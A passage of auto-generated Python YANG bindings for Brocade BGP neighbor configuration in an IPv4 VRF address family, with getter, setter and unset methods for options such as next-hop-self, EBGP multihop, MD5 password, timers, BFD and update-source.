t = YANGDynClass(v,base=next_hop_self.next_hop_self, is_container='container', presence=False, yang_name="next-hop-self", rest_name="next-hop-self", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable the next hop calculation for this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """next_hop_self must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=next_hop_self.next_hop_self, is_container='container', presence=False, yang_name="next-hop-self", rest_name="next-hop-self", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable the next hop calculation for this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__next_hop_self = t
if hasattr(self, '_set'):
self._set()
def _unset_next_hop_self(self):
self.__next_hop_self = YANGDynClass(base=next_hop_self.next_hop_self, is_container='container', presence=False, yang_name="next-hop-self", rest_name="next-hop-self", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable the next hop calculation for this neighbor', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_advertisement_interval(self):
"""
Getter method for advertisement_interval, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/advertisement_interval (container)
"""
return self.__advertisement_interval
def _set_advertisement_interval(self, v, load=False):
"""
Setter method for advertisement_interval, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/advertisement_interval (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_advertisement_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_advertisement_interval() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=advertisement_interval.advertisement_interval, is_container='container', presence=False, yang_name="advertisement-interval", rest_name="advertisement-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Minimum interval between sending BGP routing updates', u'cli-compact-syntax': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """advertisement_interval must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=advertisement_interval.advertisement_interval, is_container='container', presence=False, yang_name="advertisement-interval", rest_name="advertisement-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Minimum interval between sending BGP routing updates', u'cli-compact-syntax': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__advertisement_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_advertisement_interval(self):
self.__advertisement_interval = YANGDynClass(base=advertisement_interval.advertisement_interval, is_container='container', presence=False, yang_name="advertisement-interval", rest_name="advertisement-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Minimum interval between sending BGP routing updates', u'cli-compact-syntax': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_ebgp_btsh(self):
"""
Getter method for ebgp_btsh, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/ebgp_btsh (empty)
"""
return self.__ebgp_btsh
def _set_ebgp_btsh(self, v, load=False):
"""
Setter method for ebgp_btsh, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/ebgp_btsh (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_ebgp_btsh is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ebgp_btsh() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="ebgp-btsh", rest_name="ebgp-btsh", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable EBGP TTL Security Hack Protection', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ebgp_btsh must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ebgp-btsh", rest_name="ebgp-btsh", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable EBGP TTL Security Hack Protection', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__ebgp_btsh = t
if hasattr(self, '_set'):
self._set()
def _unset_ebgp_btsh(self):
self.__ebgp_btsh = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="ebgp-btsh", rest_name="ebgp-btsh", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable EBGP TTL Security Hack Protection', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_ebgp_multihop(self):
"""
Getter method for ebgp_multihop, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/ebgp_multihop (container)
"""
return self.__ebgp_multihop
def _set_ebgp_multihop(self, v, load=False):
"""
Setter method for ebgp_multihop, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/ebgp_multihop (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_ebgp_multihop is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ebgp_multihop() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=ebgp_multihop.ebgp_multihop, is_container='container', presence=False, yang_name="ebgp-multihop", rest_name="ebgp-multihop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow EBGP neighbors not on directly connected networks'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ebgp_multihop must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=ebgp_multihop.ebgp_multihop, is_container='container', presence=False, yang_name="ebgp-multihop", rest_name="ebgp-multihop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow EBGP neighbors not on directly connected networks'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__ebgp_multihop = t
if hasattr(self, '_set'):
self._set()
def _unset_ebgp_multihop(self):
self.__ebgp_multihop = YANGDynClass(base=ebgp_multihop.ebgp_multihop, is_container='container', presence=False, yang_name="ebgp-multihop", rest_name="ebgp-multihop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Allow EBGP neighbors not on directly connected networks'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_password(self):
"""
Getter method for password, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/password (bgp-password)
"""
return self.__password
def _set_password(self, v, load=False):
"""
Setter method for password, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/password (bgp-password)
If this variable is read-only (config: false) in the
source YANG file, then _set_password is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_password() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="password", rest_name="password", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable TCP-MD5 password protection', u'cli-multi-value': None, u'suppress-echo': u'true'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-password', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """password must be of a type compatible with bgp-password""",
'defined-type': "brocade-bgp:bgp-password",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="password", rest_name="password", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable TCP-MD5 password protection', u'cli-multi-value': None, u'suppress-echo': u'true'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-password', is_config=True)""",
})
self.__password = t
if hasattr(self, '_set'):
self._set()
def _unset_password(self):
self.__password = YANGDynClass(base=unicode, is_leaf=True, yang_name="password", rest_name="password", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable TCP-MD5 password protection', u'cli-multi-value': None, u'suppress-echo': u'true'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-password', is_config=True)
def _get_enforce_first_as(self):
"""
Getter method for enforce_first_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/enforce_first_as (container)
"""
return self.__enforce_first_as
def _set_enforce_first_as(self, v, load=False):
"""
Setter method for enforce_first_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/enforce_first_as (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_enforce_first_as is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enforce_first_as() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=enforce_first_as.enforce_first_as, is_container='container', presence=False, yang_name="enforce-first-as", rest_name="enforce-first-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enforce the first AS for EBGP routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enforce_first_as must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=enforce_first_as.enforce_first_as, is_container='container', presence=False, yang_name="enforce-first-as", rest_name="enforce-first-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enforce the first AS for EBGP routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__enforce_first_as = t
if hasattr(self, '_set'):
self._set()
def _unset_enforce_first_as(self):
self.__enforce_first_as = YANGDynClass(base=enforce_first_as.enforce_first_as, is_container='container', presence=False, yang_name="enforce-first-as", rest_name="enforce-first-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enforce the first AS for EBGP routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_timers(self):
"""
Getter method for timers, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/timers (container)
"""
return self.__timers
def _set_timers(self, v, load=False):
"""
Setter method for timers, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/timers (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_timers is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_timers() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=timers.timers, is_container='container', presence=False, yang_name="timers", rest_name="timers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'BGP per neighbor timers', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """timers must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=timers.timers, is_container='container', presence=False, yang_name="timers", rest_name="timers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'BGP per neighbor timers', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__timers = t
if hasattr(self, '_set'):
self._set()
def _unset_timers(self):
self.__timers = YANGDynClass(base=timers.timers, is_container='container', presence=False, yang_name="timers", rest_name="timers", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'BGP per neighbor timers', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_remove_private_as(self):
"""
Getter method for remove_private_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/remove_private_as (empty)
"""
return self.__remove_private_as
def _set_remove_private_as(self, v, load=False):
"""
Setter method for remove_private_as, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/remove_private_as (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_remove_private_as is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_remove_private_as() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="remove-private-as", rest_name="remove-private-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Remove private AS number from outbound updates', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """remove_private_as must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remove-private-as", rest_name="remove-private-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Remove private AS number from outbound updates', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__remove_private_as = t
if hasattr(self, '_set'):
self._set()
def _unset_remove_private_as(self):
self.__remove_private_as = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remove-private-as", rest_name="remove-private-as", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Remove private AS number from outbound updates', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_as_override(self):
"""
Getter method for as_override, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/as_override (empty)
"""
return self.__as_override
def _set_as_override(self, v, load=False):
"""
Setter method for as_override, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/as_override (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_as_override is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_as_override() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="as-override", rest_name="as-override", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Override matching AS-number while sending update'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """as_override must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="as-override", rest_name="as-override", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Override matching AS-number while sending update'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__as_override = t
if hasattr(self, '_set'):
self._set()
def _unset_as_override(self):
self.__as_override = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="as-override", rest_name="as-override", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Override matching AS-number while sending update'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_soft_reconfiguration(self):
"""
Getter method for soft_reconfiguration, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/soft_reconfiguration (container)
"""
return self.__soft_reconfiguration
def _set_soft_reconfiguration(self, v, load=False):
"""
Setter method for soft_reconfiguration, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/soft_reconfiguration (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_soft_reconfiguration is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_soft_reconfiguration() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=soft_reconfiguration.soft_reconfiguration, is_container='container', presence=False, yang_name="soft-reconfiguration", rest_name="soft-reconfiguration", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Per neighbor soft reconfiguration', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """soft_reconfiguration must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=soft_reconfiguration.soft_reconfiguration, is_container='container', presence=False, yang_name="soft-reconfiguration", rest_name="soft-reconfiguration", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Per neighbor soft reconfiguration', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__soft_reconfiguration = t
if hasattr(self, '_set'):
self._set()
def _unset_soft_reconfiguration(self):
self.__soft_reconfiguration = YANGDynClass(base=soft_reconfiguration.soft_reconfiguration, is_container='container', presence=False, yang_name="soft-reconfiguration", rest_name="soft-reconfiguration", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Per neighbor soft reconfiguration', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_static_network_edge(self):
"""
Getter method for static_network_edge, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/static_network_edge (empty)
"""
return self.__static_network_edge
def _set_static_network_edge(self, v, load=False):
"""
Setter method for static_network_edge, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/static_network_edge (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_static_network_edge is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_static_network_edge() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="static-network-edge", rest_name="static-network-edge", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor as special service edge, static-network\nshall not be advertised if installed as DROP', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """static_network_edge must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="static-network-edge", rest_name="static-network-edge", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor as special service edge, static-network\nshall not be advertised if installed as DROP', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__static_network_edge = t
if hasattr(self, '_set'):
self._set()
def _unset_static_network_edge(self):
self.__static_network_edge = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="static-network-edge", rest_name="static-network-edge", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Neighbor as special service edge, static-network\nshall not be advertised if installed as DROP', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_bfd(self):
"""
Getter method for bfd, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/bfd (container)
"""
return self.__bfd
def _set_bfd(self, v, load=False):
"""
Setter method for bfd, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/bfd (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_bfd is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bfd() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable BFD session for the neighbor', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bfd must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable BFD session for the neighbor', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__bfd = t
if hasattr(self, '_set'):
self._set()
def _unset_bfd(self):
self.__bfd = YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable BFD session for the neighbor', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_maxas_limit(self):
"""
Getter method for maxas_limit, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/maxas_limit (container)
"""
return self.__maxas_limit
def _set_maxas_limit(self, v, load=False):
"""
Setter method for maxas_limit, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/maxas_limit (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_maxas_limit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_maxas_limit() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=maxas_limit.maxas_limit, is_container='container', presence=False, yang_name="maxas-limit", rest_name="maxas-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Impose limit on number of ASes in AS-PATH attribute', u'cli-compact-syntax': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """maxas_limit must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=maxas_limit.maxas_limit, is_container='container', presence=False, yang_name="maxas-limit", rest_name="maxas-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Impose limit on number of ASes in AS-PATH attribute', u'cli-compact-syntax': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__maxas_limit = t
if hasattr(self, '_set'):
self._set()
def _unset_maxas_limit(self):
self.__maxas_limit = YANGDynClass(base=maxas_limit.maxas_limit, is_container='container', presence=False, yang_name="maxas-limit", rest_name="maxas-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Impose limit on number of ASes in AS-PATH attribute', u'cli-compact-syntax': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_update_source(self):
"""
Getter method for update_source, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/update_source (container)
"""
return self.__update_source
def _set_update_source(self, v, load=False):
"""
Setter method for update_source, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/update_source (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_update_source is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_update_source() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=update_source.update_source, is_container='container', presence=False, yang_name="update-source", rest_name="update-source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Source of routing updates', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """update_source must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=update_source.update_source, is_container='container', presence=False, yang_name="update-source", rest_name="update-source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Source of routing updates', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__update_source = t
if hasattr(self, '_set'):
